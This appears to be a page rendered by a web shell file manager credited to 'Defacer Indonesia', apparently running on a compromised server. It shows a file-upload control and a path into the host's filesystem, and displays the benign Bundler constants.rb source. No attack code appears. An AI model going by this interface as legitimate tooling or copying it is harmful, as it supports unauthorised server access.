whoami7 - Manager
:
/
proc
/
thread-self
/
root
/
opt
/
alt
/
ruby33
/
share
/
gems
/
gems
/
bundler-2.5.11
/
lib
/
bundler
/
Upload File:
files >> //proc/thread-self/root/opt/alt/ruby33/share/gems/gems/bundler-2.5.11/lib/bundler/constants.rb
# frozen_string_literal: true require "rbconfig" module Bundler WINDOWS = RbConfig::CONFIG["host_os"] =~ /(msdos|mswin|djgpp|mingw)/ deprecate_constant :WINDOWS FREEBSD = RbConfig::CONFIG["host_os"].to_s.include?("bsd") deprecate_constant :FREEBSD NULL = File::NULL deprecate_constant :NULL end
Copyright ©2021 || Defacer Indonesia